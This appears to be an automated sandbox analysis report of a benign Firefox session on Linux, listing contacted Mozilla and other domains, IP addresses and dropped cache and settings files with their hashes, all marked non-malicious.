http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
star-mini.c10r.facebook.com
185.60.216.35
truefalse
    high
    prod.balrog.prod.cloudops.mozgcp.net
    35.244.181.201
    truefalse
      unknown
      fennec-catalog-cdn.prod.mozaws.net
      13.225.78.62
      truefalse
        high
        dualstack.reddit.map.fastly.net
        151.101.129.140
        truefalse
          unknown
          twitter.com
          104.244.42.193
          truefalse
            high
            youtube-ui.l.google.com
            216.58.212.142
            truefalse
              high
              autopush.prod.mozaws.net
              35.162.110.205
              truefalse
                high
                firefox.settings.services.mozilla.com
                18.64.119.32
                truefalse
                  high
                  prod.ingestion-edge.prod.dataops.mozgcp.net
                  34.120.208.123
                  truefalse
                    unknown
                    dyna.wikimedia.org
                    91.198.174.192
                    truefalse
                      high
                      www.example.com
                      93.184.216.34
                      truefalse
                        high
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        34.160.144.191
                        truefalse
                          unknown
                          www.facebook.com
                          unknown
                          unknownfalse
                            high
                            www.reddit.com
                            unknown
                            unknownfalse
                              high
                              content-signature-2.cdn.mozilla.net
                              unknown
                              unknownfalse
                                high
                                reddit.map.fastly.net
                                unknown
                                unknownfalse
                                  unknown
                                  push.services.mozilla.com
                                  unknown
                                  unknownfalse
                                    high
                                    www.youtube.com
                                    unknown
                                    unknownfalse
                                      high
                                      www.wikipedia.org
                                      unknown
                                      unknownfalse
                                        high
                                        firefox-settings-attachments.cdn.mozilla.net
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          https://firefox.settings.services.mozilla.com/v1/false
                                            high
                                            https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/4f1bcaa0-ddf9-43ef-aca3-8378c4d05582.ftlfalse
                                              high
                                              https://push.services.mozilla.com/false
                                                high
                                                https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-USfalse
                                                  high
                                                  https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chainfalse
                                                    high
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://www.google.com/policies/privacy/scriptCache-new.bin.42.drfalse
                                                      high
                                                      https://settings.stage.mozaws.net/v1/buckets/main-preview/collections/search-config/recordsscriptCache-new.bin.42.drfalse
                                                        high
                                                        https://support.mozilla.org/kb/scriptCache-new.bin.42.drfalse
                                                          high
                                                          https://yandex.comscriptCache-new.bin.42.drfalse
                                                            high
                                                            https://trr.dns.nextdns.io/scriptCache-new.bin.42.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://bugzilla.mozilla.org/show_bug.cgi?id=921157scriptCache-new.bin.42.drfalse
                                                              high
                                                              https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_AttributesscriptCache-new.bin.42.drfalse
                                                                high
                                                                https://private.canadianshield.cira.ca/dns-query3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drfalse
                                                                  high
                                                                  http://mozilla.org/MPL/2.0/.asrouter.ftl.tmp.42.dr, DED23BB33EA3C88FAD1C0A1CD53916E0D8C424D3.42.drfalse
                                                                    high
                                                                    https://bugzilla.mozilla.org/show_bug.cgi?id=1238180scriptCache-new.bin.42.drfalse
                                                                      high
                                                                      https://ebay.comscriptCache-new.bin.42.drfalse
                                                                        high
                                                                        https://www.openh264.org/scriptCache-new.bin.42.drfalse
                                                                          high
                                                                          http://pki.goog/repo/certs/gtsr1.der04cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://firefox.dns.next3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsscriptCache-new.bin.42.drfalse
                                                                            high
                                                                            https://twitter.comscriptCache-new.bin.42.drfalse
                                                                              high
                                                                              http://x1.c.lencr.org/0cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://x1.i.lencr.org/0cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://firefox.dns.nextdns.io/scriptCache-new.bin.42.drfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://remote-settings.readthedocs.ioF8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                high
                                                                                https://profiler.firefox.comscriptCache-new.bin.42.drfalse
                                                                                  high
                                                                                  http://json-schema.org/draft-04/schema#scriptCache-new.bin.42.drfalse
                                                                                    high
                                                                                    https://mozilla.cloudflare-dns.com/dns-query3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://doh.xfinity.com/dns-query3870112724rsegmnoittet-es.sqlite-wal.42.dr, 3870112724rsegmnoittet-es.sqlite.42.drfalse
                                                                                      high
                                                                                      https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/254256B27E0C48CF9B80B695F0B3B8CA84610495.42.drfalse
                                                                                        high
                                                                                        http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changesF8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                          high
                                                                                          https://www.widevine.com/scriptCache-new.bin.42.drfalse
                                                                                            high
                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://settings.stage.mozaws.net/v1/buckets/main/collections/search-config/recordsscriptCache-new.bin.42.drfalse
                                                                                              high
                                                                                              http://crl.pki.goog/gtsr1/gtsr1.crl0Wcert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsscriptCache-child-new.bin.42.drfalse
                                                                                                high
                                                                                                http://ocsp.rootca1.amazontrust.com0:cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesscriptCache-new.bin.42.drfalse
                                                                                                  high
                                                                                                  https://pki.goog/repository/0cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/4f1bcaa0-ddf9-DED23BB33EA3C88FAD1C0A1CD53916E0D8C424D3.42.drfalse
                                                                                                    high
                                                                                                    https://firefox.settings.services.mozilla.com/v1scriptCache-new.bin.42.drfalse
                                                                                                      high
                                                                                                      https://duckduckgo.comscriptCache-new.bin.42.drfalse
                                                                                                        high
                                                                                                        https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsscriptCache-new.bin.42.drfalse
                                                                                                          high
                                                                                                          https://github.com/Kinto/kinto-attachment/F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                                            high
                                                                                                            https://amazon.comscriptCache-new.bin.42.drfalse
                                                                                                              high
                                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpscriptCache-new.bin.42.drfalse
                                                                                                                high
                                                                                                                https://firefox-settings-attachments.cdn.mozilla.net/F8CBD54DDA10F4286A41EC6A537240712D6C2308.42.drfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/flash-protected-mode-autodisabledscriptCache-new.bin.42.drfalse
                                                                                                                    high
                                                                                                                    http://crl.pki.goog/gsr2/gsr2.crl0?cert9.db.42.dr, cert9.db-journal.42.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://google.comscriptCache-new.bin.42.drfalse
                                                                                                                      high
                                                                                                                      https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5scriptCache-new.bin.42.drfalse
                                                                                                                        high
                                                                                                                        https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/recoscriptCache-new.bin.42.drfalse
                                                                                                                          high
                                                                                                                          https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2025FFD69415953BE9CE9C07B2E9C26DA959ADEA6CB.42.drfalse
                                                                                                                            high
                                                                                                                            https://baidu.comscriptCache-new.bin.42.drfalse
                                                                                                                              high
                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              35.244.181.201
                                                                                                                              prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              18.64.119.32
                                                                                                                              firefox.settings.services.mozilla.comUnited States
                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                              35.162.110.205
                                                                                                                              autopush.prod.mozaws.netUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              34.160.144.191
                                                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                              2686ATGS-MMD-ASUSfalse
                                                                                                                              109.202.202.202
                                                                                                                              unknownSwitzerland
                                                                                                                              13030INIT7CHfalse
                                                                                                                              91.189.91.43
                                                                                                                              unknownUnited Kingdom
                                                                                                                              41231CANONICAL-ASGBfalse
                                                                                                                              34.120.208.123
                                                                                                                              prod.ingestion-edge.prod.dataops.mozgcp.netUnited States
                                                                                                                              15169GOOGLEUSfalse
                                                                                                                              13.225.78.36
                                                                                                                              unknownUnited States
                                                                                                                              16509AMAZON-02USfalse
                                                                                                                              91.189.91.42
                                                                                                                              unknownUnited Kingdom
                                                                                                                              41231CANONICAL-ASGBfalse
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              No context
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3::
                                                                                                                              MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                              SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                              SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                              SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):16748
                                                                                                                              Entropy (8bit):6.086113649161584
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:v3hp6yNtafEp6yNtafENbZovYlZS5ZS9Yp6yNtafEp6yNtafENbZovwVAZS+:v3hp9LUEp9LUEAQpYp9LUEp9LUEAj
                                                                                                                              MD5:DAA948E125742AF684C4A3C0C5520AAF
                                                                                                                              SHA1:6AC86EB4BCB48D49756CA3B4CD85C96CA69077BB
                                                                                                                              SHA-256:58913F8BCF7F8F1999006ADD7DD3D42B95F0C734A02BD625DDD4375751440825
                                                                                                                              SHA-512:53F7586238DEF07E5F2F75E2E688554AADA073991B980587D2757D97B737AA8220EDD62EBC01D8F1B59DEFDF7CA49F4365D05EF64667178E20F14EF958B5AD81
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"permissions":{},"data":{"attachment":{"hash":"0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0","size":7581,"filename":"asrouter.ftl","location":"main-workspace/ms-language-packs/4f1bcaa0-ddf9-43ef-aca3-8378c4d05582.ftl","mimetype":"application/octet-stream"},"id":"cfr-v1-en-US","last_modified":1648230346554}}.."..............cO,RD..3cO,R...q....:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEANgFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAYDMIIF/zCCA+egAwIBAgIQAzyzlZhv2/WO5YKmr8CCNjANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTIyMTAxNzIwNDQzNVoXDTIzMTAxNzIwNDQzNVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwp
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):15236
                                                                                                                              Entropy (8bit):6.040272999739142
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:wYaZO3iSvcB3+mUlTaIdcYaZO3iSvcB3+mUlTaIdT:wJZO3oBOba8cJZO3oBOba8T
                                                                                                                              MD5:B476769587D2782C6F5861A96CF48575
                                                                                                                              SHA1:9D996D6163918AD2A8347228EB6925438573A932
                                                                                                                              SHA-256:24B3FD006D51B0869B0B408FAE8546A140B1518312DE9350C6D7E8BD79D3F8B9
                                                                                                                              SHA-512:4DABFA8DCE4062379DB7A6090CC7326F879F482A1371E98C8414D2BE3FE702C15840CB2742E9D6CA457CE62CE0CDE5B631F1A7BBFB6C886D6F2C313270F163B8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:...........cO,LcO,ND...cO,N........a,~1666133035,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/deletion-request/1/b15353ee-6d41-4b99-a1da-728cade21808.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEANgFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAWTMIIFjzCCA3egAwIBAgIRAI2/iCZmVi80EEDKy4jUS3wwDQYJKoZIhvcNAQELBQAwgZIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRYwFAYDVQQHDA1TYW4gRnJhbmNpc2NvMSowKAYDVQQKDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQxKjAoBgNVBAMMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDAeFw0yMjEwMTcyMDQ0MjlaFw0yMzEwMTcyMDQ0MjlaMCkxJzAlBgNVBAMTHmluY29taW5nLnRlbGVtZXRyeS5tb3ppbGxhLm9yZzCCASAwDQYJKoZIhvcNAQEBBQADggENADCCAQgCggEBAKszYTZRPhoG9e+N1DZbUZDAqFHMw01Q77ieI39cYyBq0zc3XVwNJF56HMZUHiovDoWjQYepNj6fbLktN2QqRZ95TQlFlgBYmXgoox9UcliyqOJSQEicEyaoTco1STsI+xQdP50sRsaFDZfct38m1yWqy7bhVTvqNg7/XIX+QSiLS/1I1AL+4+vRuSaporMYovUlI4d+KdPQOoS+9LwRb3SHz+igLHvNMMcKevJ2njMhXy352Chx1Tp
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7590
                                                                                                                              Entropy (8bit):6.054343056612626
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:zXfGYraZYwrWxeEyBaKYMfbaI8j3qRFvLE:zGYaZYwrWsXcoTaIdRhQ
                                                                                                                              MD5:D3599B7A7C8972C3A6EAB30CEDC19DF1
                                                                                                                              SHA1:2E3E6444C6A5FAAC32E4C960AE5F3ECAF8C47F39
                                                                                                                              SHA-256:601C2306A6E8AE89E63D6AB9E510EA428C112CD7A79A6D7F9AD962A8F3592DFC
                                                                                                                              SHA-512:3822DA2449D191BD0CB76AA40F4DD22F78A44EA2BB81F994B73E4C8B98EA310C4BDB78F61BAC2C75935B45FB4BB34E4348F8B1B91347830A7A434F2973A1BE1D
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:AD..z.........cO,6cO,8D...cO,8...{....:https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chain.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEANgFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAWoMIIFpDCCA4ygAwIBAgISA8KDXl2VnpgfLrwMrCkNTSOSMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEqMCgGA1UECgwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMSowKAYDVQQDDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQwHhcNMjIxMDE3MjA0NDA3WhcNMjMxMDE3MjA0NDA3WjAuMSwwKgYDVQQDEyNjb250ZW50LXNpZ25hdHVyZS0yLmNkbi5tb3ppbGxhLm5ldDCCASAwDQYJKoZIhvcNAQEBBQADggENADCCAQgCggEBAKszYTZRPhoG9e+N1DZbUZDAqFHMw01Q77ieI39cYyBq0zc3XVwNJF56HMZUHiovDoWjQYepNj6fbLktN2QqRZ95TQlFlgBYmXgoox9UcliyqOJSQEicEyaoTco1STsI+xQdP50sRsaFDZfct38m1yWqy7bhVTvqNg7/XIX+QSiLS/1I1AL+4+vRuSaporMYovUlI4d+KdPQOoS+9LwRb3SHz+igLHvNMMcKevJ2njMhXy352Chx1T
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):15327
                                                                                                                              Entropy (8bit):5.832331387640302
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:63/CCBm4CsBJumwOGmnOqiwpJibAKGb9CqwGLe3yEw2JTqcBje3yEw2JTqcBHNbI:OHPnIwyqwGaiNmOc4iNmOcVA5vD
                                                                                                                              MD5:63248E2B87CF81A09664A4EA7BC18781
                                                                                                                              SHA1:A6EA2F26447EE909B29FAB0EB909CFC6186F69CF
                                                                                                                              SHA-256:2C9B40AAAB02CF7B9A9574E3146075E3A02655B8EE90F96037FCC7CE1B88E0F5
                                                                                                                              SHA-512:41CD6174544A9D35BE8F4C0C383F393109323C3FF55149E777C33817A99DF6B8400238EA8B8B1B9A28C092F5EAD326B993CAFE74D88099A3A2FF8B7B6185BEA9
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...## These messages are used as headings in the recommendation doorhanger..cfr-doorhanger-extension-heading = Recommended Extension.cfr-doorhanger-feature-heading = Recommended Feature..##..cfr-doorhanger-extension-sumo-link =. .tooltiptext = Why am I seeing this..cfr-doorhanger-extension-cancel-button = Not Now. .accesskey = N..cfr-doorhanger-extension-ok-button = Add Now. .accesskey = A..cfr-doorhanger-extension-manage-settings-button = Manage Recommendation Settings. .accesskey = M..cfr-doorhanger-extension-never-show-recommendation = Don.t Show Me This Recommendation. .accesskey = S..cfr-doorhanger-extension-learn-more-link = Learn more..# This string is used on a new line below the add-on name.# Variables:.# $name (String) - Add-on author name.cfr-doorhanger-extension-author =
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8916
                                                                                                                              Entropy (8bit):6.0902553294211
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:sNbPzvXlMD5ETZmBRXMcA6AtWrfOVlMD5ETZmBRXMcA6AtWrfOeMbm5uZGebZov0:sNbPbXp6yNtafEp6yNtafENbZovrSz
                                                                                                                              MD5:B338E4185CB053134C3505930EDBA7E6
                                                                                                                              SHA1:10E2443693FDCFC1C050B1E882C583E1F774D7B1
                                                                                                                              SHA-256:4B76659F06462221DB2502913A91005BE54C4378B728049AD17850FAD6569F55
                                                                                                                              SHA-512:4DD9062C57CA82C92D1C486D9A8C2CA2A7192D8C4A15107CB16978B8699C6A9B9AEFB583F7BBCDFD4DDB40CFC0F31F49C5AC7E9AA74F2CF5CCEB504B7766700D
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:{"project_name":"Remote Settings PROD","project_version":"14.8.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":true,"explicit_permissions":false},"capabilities":{"changes":{"description":"Track modifications of records in Kinto and store the collection timestamps into a specific bucket and collection.","url":"http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes","version":"29.2.0","collections":["/buckets/blocklists","/buckets/blocklists-preview","/buckets/main","/buckets/main-preview","/buckets/security-state","/buckets/security-state-preview"]},"attachments":{"description":"Add file attachments to records","url":"https://github.com/Kinto/kinto-attachment/","version":"6.3.0","base_url":"https://firefox-settings-attachments.cdn.mozilla.net/"}}}8..A.........cO,TcO,TD..4cO,T...2....:https://firefox.settin
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7581
                                                                                                                              Entropy (8bit):4.764879972898958
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:63/CCBm4CsBJumwOGmnOqiwpJibAKGb9CqwGV:OHPnIwyqwGV
                                                                                                                              MD5:C460716B62456449360B23CF5663F275
                                                                                                                              SHA1:06573A83D88286153066BAE7062CC9300E567D92
                                                                                                                              SHA-256:0EC0F16F92D876A9C1140D4C11E2B346A9292984D9A854360E54E99FDCD99CC0
                                                                                                                              SHA-512:476BC3A333AACE4C75D9A971EF202D5889561E10D237792CA89F8D379280262CE98CF3D4728460696F8D7FF429A508237764BF4A9CCB59FD615AEE07BDCADF30
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...## These messages are used as headings in the recommendation doorhanger..cfr-doorhanger-extension-heading = Recommended Extension.cfr-doorhanger-feature-heading = Recommended Feature..##..cfr-doorhanger-extension-sumo-link =. .tooltiptext = Why am I seeing this..cfr-doorhanger-extension-cancel-button = Not Now. .accesskey = N..cfr-doorhanger-extension-ok-button = Add Now. .accesskey = A..cfr-doorhanger-extension-manage-settings-button = Manage Recommendation Settings. .accesskey = M..cfr-doorhanger-extension-never-show-recommendation = Don.t Show Me This Recommendation. .accesskey = S..cfr-doorhanger-extension-learn-more-link = Learn more..# This string is used on a new line below the add-on name.# Variables:.# $name (String) - Add-on author name.cfr-doorhanger-extension-author =
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):512014
                                                                                                                              Entropy (8bit):5.060589220592942
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:HykPreu5AMr56pLwC4tbkd2+aPZLucfYJoRalo3sxh6tmS3t:SGGW8LwC4tpS9JCqIV3t
                                                                                                                              MD5:FE8E79FAEB73FCA1E242EB9C359583AF
                                                                                                                              SHA1:341FE7346268BF5B57CA5152DB299E76C6CC34FF
                                                                                                                              SHA-256:D14813D31B8866079D7540192D95E43E8B8E8D072B9A78D3EBA3AF164D2B318C
                                                                                                                              SHA-512:593F87458E6CB77C241A025BD3EC8AA1A49B2F82B1A9EEFAB424FEF21BB08B85DA2EDB69CF0C92B82B7FAC3CD48ADDF2911E176135E1A30D2D5BD484F7606579
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:mozXDRcachev002.....*.chrome://global/content/process-content.js*.chrome://global/content/process-content.js....`....6.resource://gre/modules/extensionProcessScriptLoader.js6.resource://gre/modules/extensionProcessScriptLoader.js`...4....1.resource://gre/modules/ExtensionProcessScript.jsmF.jsloader/non-syntactic/resource/gre/modules/ExtensionProcessScript.jsm.....X...).resource://gre/modules/MessageChannel.jsm>.jsloader/non-syntactic/resource/gre/modules/MessageChannel.jsm0]..h....).resource://gre/modules/ExtensionUtils.jsm>.jsloader/non-syntactic/resource/gre/modules/ExtensionUtils.jsm.....?... .resource://gre/modules/Timer.jsm5.jsloader/non-syntactic/resource/gre/modules/Timer.jsmP'.......*.resource://gre/modules/ExtensionCommon.jsm?.jsloader/non-syntactic/resource/gre/modules/ExtensionCommon.jsmL=..t....".resource://gre/modules/Schemas.jsm7.jsloader/non-syntactic/resource/gre/modules/Schemas.jsm....d....<.resource://gre/modules/URLQueryStrippingListProcessScript.js<.resource://gre/m
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8056251
                                                                                                                              Entropy (8bit):5.203572971644196
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:BZLE60+X3aplFYgW0+NubcuApK9lt2tidKxgAF3zyQFWj31MPU1HdGM3sem7x:oT/9bcuApK92tidKxg+3ra314t
                                                                                                                              MD5:C831EC9AC14945905EA37349F3371B23
                                                                                                                              SHA1:927C1E5957B5EF0C6FC6BE6F4E208FA97FB575F5
                                                                                                                              SHA-256:21734962CAFE3BC39DFD0BF69C8B387885EC75314107612B16329EBBEB0B77E4
                                                                                                                              SHA-512:7BE55884D30AF7B4F8C2921B093FCE71C1BEEC3B55BD6F499D1830AC81499B18349EDD2F9407BAD486D3D7E1328D34B8297500B6DA3AB07876F4FC478A6A3FE6
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:mozXDRcachev002.s.../.resource://gre/modules/MainProcessSingleton.jsmD.jsloader/non-syntactic/resource/gre/modules/MainProcessSingleton.jsm.........#.resource://gre/modules/Services.jsm8.jsloader/non-syntactic/resource/gre/modules/Services.jsm....d....1.resource://gre/modules/CustomElementsListener.jsmF.jsloader/non-syntactic/resource/gre/modules/CustomElementsListener.jsmh...L....#.resource:///modules/BrowserGlue.jsm;.jsloader/non-syntactic/resource/app/modules/BrowserGlue.jsm.........%.resource://gre/modules/XPCOMUtils.jsm:.jsloader/non-syntactic/resource/gre/modules/XPCOMUtils.jsmP...TU...'.resource://gre/modules/AppConstants.jsm<.jsloader/non-syntactic/resource/gre/modules/AppConstants.jsm.#.......-.resource://gre/modules/ActorManagerParent.jsmB.jsloader/non-syntactic/resource/gre/modules/ActorManagerParent.jsm08..0O...-.resource://gre/modules/EnterprisePolicies.jsmB.jsloader/non-syntactic/resource/gre/modules/EnterprisePolicies.jsm`........3.resource://gre/modules/EnterprisePolici
                                                                                                                              Process:/usr/lib/firefox/firefox
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2519
                                                                                                                              Entropy (8bit):4.715720789856489
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:UoixAl2dXUGttISt3bqJtgtkt0IbFr9cHSWpVcaXBsneJrQN:b6Al2dXUIIq3bAcwfWseJru
                                                                                                                              MD5:5E1F3FF26D9DEA177805D93438F96F0D
                                                                                                                              SHA1:A201674726401BDDDF6427457F94AE666872C50C
                                                                                                                              SHA-256:C9451A0A31776D9755E52C8BE9ACF3A97510D56E47DB2D4D3E6F176F16780D12
                                                                                                                              SHA-512:42BF4B2C91419B80CBAB31E92E47B361EA424E1BE177379CA7D8B13C21BECE12F73156E95F667AFF77E0F0C7CFB1A32FB8E7984B4DFACD3DAEC6923FBCF06565
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
